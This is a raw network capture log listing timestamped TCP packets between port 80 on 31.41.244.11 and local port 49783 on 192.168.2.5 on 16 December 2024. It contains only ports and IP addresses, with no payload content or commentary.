Dec 16, 2024 11:03:10.633095980 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.633166075 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.633239031 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.633301020 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.634462118 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.634532928 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.634603977 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.634665966 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.635845900 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.635914087 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.635971069 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.636028051 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.637203932 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.637274027 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.637326002 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.637386084 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.638576984 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.638639927 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.638655901 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.638717890 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.639965057 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.640117884 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.640197992 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.641349077 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.641515970 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.641593933 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.642729044 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.642877102 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.642956972 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.644087076 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.644175053 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.644192934 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.645453930 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.645535946 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.645560980 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.645807981 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.646846056 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.646934032 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.647031069 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.648190975 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.648315907 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.648387909 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.649555922 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.649755955 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.649822950 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.650903940 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.650970936 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.651041031 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.652313948 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.652383089 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.652453899 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.653707027 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.653774023 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.653810978 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.653872013 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.655040979 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.655148983 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.655215025 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.656409979 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.656517982 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.656605005 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.657727957 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.660800934 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.775405884 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.775454998 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.775543928 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.775943041 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.776056051 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.776129961 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.777201891 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.777240038 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.777280092 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.777306080 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.787148952 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.787206888 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.787242889 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.787281036 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.787297964 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.787341118 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.787350893 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.787365913 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.787441969 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.787475109 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.787507057 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.787535906 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.787574053 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.788865089 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.788918018 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.788928032 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.788953066 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.789012909 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.789089918 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.789124012 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.789150000 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.789159060 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.789191008 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.789191961 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.789211988 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.789242029 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.789253950 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.789288998 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.789328098 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.789351940 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.789376974 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.789413929 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.789448023 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.789474964 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.789494991 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.789567947 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.789602041 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.789629936 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.789649010 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.798532963 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.798608065 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.798686028 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.798741102 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.798746109 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.798775911 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.798790932 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.798811913 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.798826933 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.798850060 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.798861027 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.798913002 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.798955917 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.799010038 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.799026012 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.799043894 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.799066067 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.799077988 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.799112082 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.799113035 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.799140930 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.799148083 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.799165010 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.799182892 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.799216986 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.799232960 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.799252987 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.799280882 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.799307108 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.799369097 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.799422979 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.799428940 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.799459934 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.799485922 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.799578905 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.800246954 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.800323009 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.800365925 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.800421000 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.801336050 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.801405907 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.801459074 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.801516056 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.802515984 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.802576065 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.802615881 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.802670956 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.803576946 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.803648949 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.803694010 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.803754091 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.804657936 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.804722071 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.804804087 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.804866076 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.805758953 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.805821896 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.805939913 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.806006908 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.806845903 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.806922913 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.806972027 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.807032108 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.808038950 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.808103085 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.808182955 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.808243990 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.809076071 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.809132099 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.809142113 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.809178114 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.810185909 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.810256004 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.810307980 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.810363054 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.811259985 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.811345100 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.811395884 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.811455011 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.812479973 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.812549114 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.812552929 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.812604904 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.813502073 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.813536882 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.813561916 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.813591003 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.814554930 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.814609051 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.814659119 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.814723015 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.815682888 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.815742016 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.815819979 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.815879107 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.816839933 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.816896915 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.816911936 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.816963911 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.817879915 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.817939043 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.817987919 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.818042040 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.818985939 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.819046974 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.819096088 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.819150925 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.820101976 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.820164919 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.820216894 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.820274115 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.821180105 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.821238995 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.821285009 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.821338892 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.822298050 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.822351933 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.822429895 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.822515965 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.823415041 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.823477983 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.823522091 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.823580027 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.824531078 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.824585915 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.824635983 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.824693918 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.825637102 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.825694084 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.825864077 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.825918913 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.826772928 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.826828003 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.826872110 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.826926947 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.827887058 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.827950001 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.827975988 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.828032970 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.828927994 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.828982115 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.829026937 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.829076052 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.830035925 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.830087900 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.830158949 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.830209970 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.831113100 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.831163883 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.831307888 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.831358910 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.832391977 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.832442999 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.832472086 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.832524061 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.833323956 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.833376884 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.967777967 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.967843056 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.967926025 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.968113899 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.968244076 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.968300104 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.969193935 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.969388008 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.969455004 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.970287085 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.970351934 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.970427990 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.970526934 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.971424103 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.971502066 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.971556902 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.971637011 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.972500086 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.972615957 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.972677946 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.972735882 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.973598003 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.973656893 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.973731995 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.973798990 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.974720001 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.974785089 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.974796057 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.975182056 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.975809097 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.975914001 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.975972891 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.976932049 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.977037907 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.977066040 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.977998972 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.978054047 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.978137016 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.979114056 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.979192019 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.979201078 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.979284048 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.980220079 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.980276108 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.980278015 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.980324030 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.981297016 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.981358051 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.981395006 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.981467962 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.982428074 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.982496977 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.982564926 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.982630014 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.983582973 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.983653069 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.983711004 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.983783960 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.984703064 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.984751940 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.984807014 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.984874010 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.985749960 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.985820055 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.985850096 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.985902071 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.986852884 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.986923933 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.986977100 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.987963915 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.988085032 CET	80	49783	31.41.244.11	192.168.2.5
